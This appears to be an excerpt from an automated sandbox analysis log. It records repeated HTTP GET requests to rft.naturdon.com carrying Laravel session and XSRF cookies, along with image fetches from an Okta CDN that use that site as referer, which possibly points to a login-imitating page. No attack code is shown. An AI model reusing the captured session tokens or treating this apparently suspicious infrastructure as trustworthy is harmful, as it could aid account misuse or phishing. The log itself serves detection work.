laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /dezNUCB7F1KEsi0FN0wryA8y4av4n6Oz1WzLtiMGksrOn987oMYSmcxxtWYou2jfcMbVvmkb60VdA3wr1dwZEXuZoYuejWksgw45j3q4VZxbXQF10CkWdNYZxh3MHx6WHC7lGtJJ6scfMTtvSsNFNJCw93uLSr83gx6zpijd2MxlyhgcWIfR6tYb2L6cd662 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /wxR15iAruHCp5MR53stdlsbAewGX1FsavzlKmlR34130 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /rsj9FvgfYrm0DCkU7R3E0ZVRtwZjLNORj7eVq7ghG3bg6DT6IOZl4JRef193 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /qrhmLtoaKGMi81xl8TzghJ99XVgOdtJgIR4uW45140 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijrlV3hi6dkeYhbR0U6WhmmiYz2MGccNsZegAMCklGrcaCM65n1iEmiCkEsATX4zN3WzSG5I12210 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /efueBIf7KMBbXW0qQF2zeji3jy0JijcyRqJUUwcvNTCnOUKvkR78143 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /optadu1ofPxrFCa4cOe9bGejoa2vR7hUGzGuvm86IppsV4y85FAZpZxeuef235 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijQ0IOXUR1aIdE2dIax8V9VT5mgSv8B3wxiSY8D4KNzfk5az6fKC4B8vvw56170 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /yzUMXXAK9cdiVG7unTSOjXlhW72wM8rZJ7uRvQrQmnp9mH4LntaZDifn490180 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /uvJtmTGXX2g3FEEqQIMgBrLoxZ456mS64jlG3A6l7y7Lxkm6YTIoOlgS7jv42MEgh260 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /rsj9FvgfYrm0DCkU7R3E0ZVRtwZjLNORj7eVq7ghG3bg6DT6IOZl4JRef193 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijrlV3hi6dkeYhbR0U6WhmmiYz2MGccNsZegAMCklGrcaCM65n1iEmiCkEsATX4zN3WzSG5I12210 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /optadu1ofPxrFCa4cOe9bGejoa2vR7hUGzGuvm86IppsV4y85FAZpZxeuef235 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
